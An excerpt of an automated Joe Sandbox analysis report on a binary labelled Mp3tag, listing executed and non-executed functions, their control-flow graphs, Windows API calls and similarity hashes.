                                                                                                            control_flow_graph 167 8133c0-8133ee 168 8133f4-813401 167->168 169 813629-813630 167->169 170 813471-81347a 168->170 171 813403-813418 168->171 172 813636-813648 169->172 173 81376e-813774 169->173 170->171 178 81347c-813489 170->178 174 813434-813443 171->174 175 81341a-81342a 171->175 176 81364a call 812e40 172->176 177 81364f-813670 172->177 179 813776 call 813100 173->179 180 81377b-813783 173->180 183 813449-813458 174->183 184 8134dc-8134de 174->184 181 81345d-81346c 175->181 182 81342c-81342f 175->182 176->177 186 813672-81367a 177->186 187 81367c-81368b 177->187 178->171 188 81348f-81349c 178->188 179->180 181->180 182->180 183->180 194 8134e0 call 812e40 184->194 195 8134e5-8134ef 184->195 190 8136e2-813703 186->190 191 8136a0-8136a8 187->191 192 81368d-81369e 187->192 188->171 193 8134a2-8134b5 188->193 202 813720-813732 190->202 203 813705-813717 190->203 198 8136aa-8136cc 191->198 199 8136ce-8136d0 call 813000 191->199 192->190 193->170 200 8134b7-8134ca Sleep 193->200 194->195 196 8134f5-813538 195->196 197 813584-813590 195->197 205 81353a-813545 196->205 206 81354e-813562 196->206 209 813592-8135a6 197->209 210 8135bc-8135c2 call 813000 197->210 211 8136d5-8136dd 198->211 199->211 200->171 212 8134d0-8134da Sleep 200->212 207 813754 202->207 208 813734-81374b 202->208 203->202 204 813719 203->204 204->202 205->206 214 813547 205->214 217 813564-813582 call 812ef0 206->217 218 8135dc 206->218 215 813759-81376c 207->215 208->215 216 81374d-813752 call 812ef0 208->216 219 8135a8 209->219 220 8135aa-8135ba 209->220 225 8135c7-8135cd 210->225 211->180 212->170 214->206 215->180 216->215 222 8135e1-813624 217->222 218->222 219->220 220->222 222->180 225->222 228 8135cf-8135d7 225->228 228->180
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(?,?,?,?,00813385), ref: 008134BC
                                                                                                            • Sleep.KERNEL32(?,?,?,?,00813385), ref: 008134D5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 4c9655a6c0adc59d052be7f8f3d2e1d4f18074e7aad082d6f4edab94988b3583
                                                                                                            • Instruction ID: 0a8e41e57bbba07b72ad65783eae443894a48f6f46b9799b7084a6e4d2600abf
                                                                                                            • Opcode Fuzzy Hash: 4c9655a6c0adc59d052be7f8f3d2e1d4f18074e7aad082d6f4edab94988b3583
                                                                                                            • Instruction Fuzzy Hash: F2B1E1B3205B8086DB058F29E8503A877AAFB54B68F58C229C79A87394DF78C6D5C351
                                                                                                            Function 0081C830 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemDefaultUILanguage.KERNEL32 ref: 0081C99D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultLanguageSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 4166810957-0
                                                                                                            • Opcode ID: 77cf6a5ef9b3eecf8ed6828d92d8cb5f7aa7c873bd7d42051a8b78f251878896
                                                                                                            • Instruction ID: 880eb17663f895b0d5fd6fb5e91e9bb34e09907da8d1c0a7d692e984192c0261
                                                                                                            • Opcode Fuzzy Hash: 77cf6a5ef9b3eecf8ed6828d92d8cb5f7aa7c873bd7d42051a8b78f251878896
                                                                                                            • Instruction Fuzzy Hash: 6751E176240B8489DB20AF79C8953D93B6AFB84B9CF505016EA4E8BB59DF74C9C4C381
                                                                                                            Function 00818160 Relevance: 1.6, APIs: 1, Instructions: 79threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 281 818160-818184 282 818186 281->282 283 81818d-8181da GetCurrentThreadId 281->283 282->283 284 8181e8 283->284 285 8181dc-8181e6 283->285 286 8181f0-818231 284->286 285->286 287 818233-81823a 286->287 288 81823c 286->288 287->288 289 818245-81824d 287->289 288->289 290 818262-818269 289->290 291 81824f-818255 289->291 292 818274-81827c 290->292 293 81826b 290->293 291->290 294 818290-818297 292->294 295 81827e-81828a call 815630 292->295 293->292 297 8182a0 call 818920 294->297 298 818299 call 8180b0 294->298 295->294 302 8182a5-8182b2 297->302 303 81829e 298->303 303->302
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 008181CA
                                                                                                              • Part of subcall function 00818920: GetCurrentThreadId.KERNEL32 ref: 00818950
                                                                                                              • Part of subcall function 00818920: FreeLibrary.KERNEL32 ref: 00818A46
                                                                                                              • Part of subcall function 00818920: ExitProcess.KERNEL32 ref: 00818A9A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$ExitFreeLibraryProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 274535261-0
                                                                                                            • Opcode ID: bc6cb27685d170801dc153e54490b559740cdb6ce67cc7e3b3695f5ee6859b39
                                                                                                            • Instruction ID: 803d36578cfea16a538ee86c336786435c3d256995e61d49b489754188ea1044
                                                                                                            • Opcode Fuzzy Hash: bc6cb27685d170801dc153e54490b559740cdb6ce67cc7e3b3695f5ee6859b39
                                                                                                            • Instruction Fuzzy Hash: 3A313732504FC8DADB629F24EC497DA37BDFB09798F804125DA8947664CF748A8AC740
                                                                                                            Function 0081CA80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 0081CABC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName
                                                                                                            • String ID:
                                                                                                            • API String ID: 514040917-0
                                                                                                            • Opcode ID: 06525e5b9e24325f7c3240e3b21ee2fd0a0e75d447f2783c5308c15076a81e62
                                                                                                            • Instruction ID: d80ba7fc39b79ead4f034f93492e51e392d88725f9e127b70bb0118ba355e236
                                                                                                            • Opcode Fuzzy Hash: 06525e5b9e24325f7c3240e3b21ee2fd0a0e75d447f2783c5308c15076a81e62
                                                                                                            • Instruction Fuzzy Hash: 1A114872211A5089DB20EF78D4913D93769FB0478CF40201AFA4E87B48DF35C5C8C391
                                                                                                            Function 00817150 Relevance: 1.5, APIs: 1, Instructions: 42filelibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateLibraryLoadRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292244806-0
                                                                                                            • Opcode ID: efd5595c977a8a0e6c139ffeb25316ac5e8276f53f6fa1802eea0287adffb4c9
                                                                                                            • Instruction ID: 60517eaee1c0d5f3f2d414f56236a217f6836e313c9a25d4da80b96adcb5de51
                                                                                                            • Opcode Fuzzy Hash: efd5595c977a8a0e6c139ffeb25316ac5e8276f53f6fa1802eea0287adffb4c9
                                                                                                            • Instruction Fuzzy Hash: 4611423A618A84CAD760DB1AE49079EBBB5F7C9B90F118116DF8943B28DF39D844DF00
                                                                                                            Function 00816FF0 Relevance: 1.3, APIs: 1, Instructions: 60memoryfileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 346 816ff0-816ffa 347 817002-8170b2 call 81765e LocalAlloc call 81765e 346->347 348 816ffd call 81777e 346->348 354 8170b6-8170d7 347->354 348->347 355 8170f7 354->355 356 8170d9-8170f5 354->356 357 8170ff-817111 355->357 356->354 359 817113-817148 357->359 360 81714a-817166 357->360 359->357 361 81716e-81720d CreateFileW call 81765e 360->361 362 817169 call 81765e 360->362 366 817216-817305 call 81765e ReadFile 361->366 367 81720f-817211 361->367 362->361 371 81731f-81732a 366->371 369 8175d5-8175dc 367->369 372 817343-81752b call 81765e * 2 LoadLibraryA VirtualProtect call 816e7e VirtualProtect 371->372 373 81732c-817341 371->373 381 817533-817547 372->381 373->371 382 817579-8175d3 381->382 383 817549-817577 381->383 382->369 383->381
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocCreateFileLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2038206053-0
                                                                                                            • Opcode ID: b967a78d27e691a075fda64b6ba613f0089f0f83d05fc38f2409352bc298bcaf
                                                                                                            • Instruction ID: 1ff98686854e885adb87c9b271a070b4f0c27c8b72ad100a85ababf29ccea0e4
                                                                                                            • Opcode Fuzzy Hash: b967a78d27e691a075fda64b6ba613f0089f0f83d05fc38f2409352bc298bcaf
                                                                                                            • Instruction Fuzzy Hash: 3C316A76209B848BC764DB19E49165EBBB4F7C9B80F21441AEB8DC3B69DE39D844CF00

                                                                                                            Non-executed Functions

                                                                                                            Function 0081BD50 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirstlstrlen
                                                                                                            • String ID: GetLongPathNameW$kernel32.dll
                                                                                                            • API String ID: 2767606509-568771998
                                                                                                            • Opcode ID: 2665e3b94bfe25624f7e04fb04d0b8ae093503aa6e9cf72ce73661df732d25d2
                                                                                                            • Instruction ID: 1696346e7c0b2f9885d0c00dc9580557e5c32b7ffad3d77f4ecddfe7605f48cb
                                                                                                            • Opcode Fuzzy Hash: 2665e3b94bfe25624f7e04fb04d0b8ae093503aa6e9cf72ce73661df732d25d2
                                                                                                            • Instruction Fuzzy Hash: 0451C622300A4494CB24DF29D8453E92769FF48BECF459226EE1E97B94EF38C9D5C340
                                                                                                            Function 0081B390 Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 31libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,0081D46D), ref: 0081B39B
                                                                                                            • GetVersion.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3A9
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3D0
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3DF
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B3F2
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B401
                                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,0081D46D), ref: 0081B414
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,0081D46D), ref: 0081B423
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                                            • API String ID: 74573329-1403180336
                                                                                                            • Opcode ID: a5f62936e888c5de3436546e656f9a8fda71b3b8aca561aab0a6b158481b938a
                                                                                                            • Instruction ID: bbf4fb4ec23c1295defae2b37d4e6936e2cfb54d119d8da405ce288e539c78f8
                                                                                                            • Opcode Fuzzy Hash: a5f62936e888c5de3436546e656f9a8fda71b3b8aca561aab0a6b158481b938a
                                                                                                            • Instruction Fuzzy Hash: 16011D75241D5490E615EB18FC933EA276DFF60702F98C036918E86273EF6C85E6C385
                                                                                                            Function 00816C50 Relevance: 10.6, APIs: 7, Instructions: 150threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: 54b8d3a62475870eb52297588eecad8aef7af839a91c08c1c448b13a2dd73674
                                                                                                            • Instruction ID: 4ecb71b5d46536cafdeb3e67a3abc31b9ec2d5089512bf545e30f8054e853bf4
                                                                                                            • Opcode Fuzzy Hash: 54b8d3a62475870eb52297588eecad8aef7af839a91c08c1c448b13a2dd73674
                                                                                                            • Instruction Fuzzy Hash: BC41C5B23016058DDF189E3DD9503EA2B98FF487BDB155229EE8DC3754EA32C8E18380
                                                                                                            Function 00818840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID: Error$Runtime error at 0000000000000000
                                                                                                            • API String ID: 3320372497-326393251
                                                                                                            • Opcode ID: 80a1c5bf2f94d13c86562c33573aabb6c1779ad0f4996c1b29b72bbd5a3ee485
                                                                                                            • Instruction ID: e0a602b535a479f3bdf8c0125fe22dc8db3dc81b766e0edbcae5bc51aac21df1
                                                                                                            • Opcode Fuzzy Hash: 80a1c5bf2f94d13c86562c33573aabb6c1779ad0f4996c1b29b72bbd5a3ee485
                                                                                                            • Instruction Fuzzy Hash: FB118051608A4494FB11EB64EC167E53669FF44765FC0821AA99E867E1DF3CC6C4CB03
                                                                                                            Function 0081DBB5 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 247COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3997070919-2852464175
                                                                                                            • Opcode ID: eb5f00e2425578da8bc166ff20cdd415e129435e052d450994fa6166bcee0d28
                                                                                                            • Instruction ID: 12291bff94551b6c4949d050fd9b1bdbcbee0db27434e37a2b0926fe08bf7d85
                                                                                                            • Opcode Fuzzy Hash: eb5f00e2425578da8bc166ff20cdd415e129435e052d450994fa6166bcee0d28
                                                                                                            • Instruction Fuzzy Hash: 7BD1B236208B8486D770DB19F8843DAB7A5FB88784F504529EACD87BA8DF7CC584CB41
                                                                                                            Function 0081B9E0 Relevance: 6.1, APIs: 4, Instructions: 104threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32 ref: 0081B9F9
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0081BA70
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0081BADF
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0081BB1F
                                                                                                              • Part of subcall function 0081B980: GetThreadPreferredUILanguages.KERNEL32(?,?,?,00000000,?,0081BA82), ref: 0081B9A6
                                                                                                              • Part of subcall function 0081B980: GetThreadPreferredUILanguages.KERNEL32(?,?,?,00000000,?,0081BA82), ref: 0081B9CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.1382837892.0000000000811000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00810000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.1382803520.0000000000810000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.0000000000824000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382837892.000000000084C000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000084F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382917965.000000000085B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382942909.0000000000861000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000863000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.1382954187.0000000000865000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_810000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 083913806fa799246881c58492fe02d5fcd08b4e12b0d3b0e2f3b3cde12946e3
                                                                                                            • Instruction ID: ca1fe400edc4b7f112a1644c9235c3822a389a119583021c06c902773400c9e8
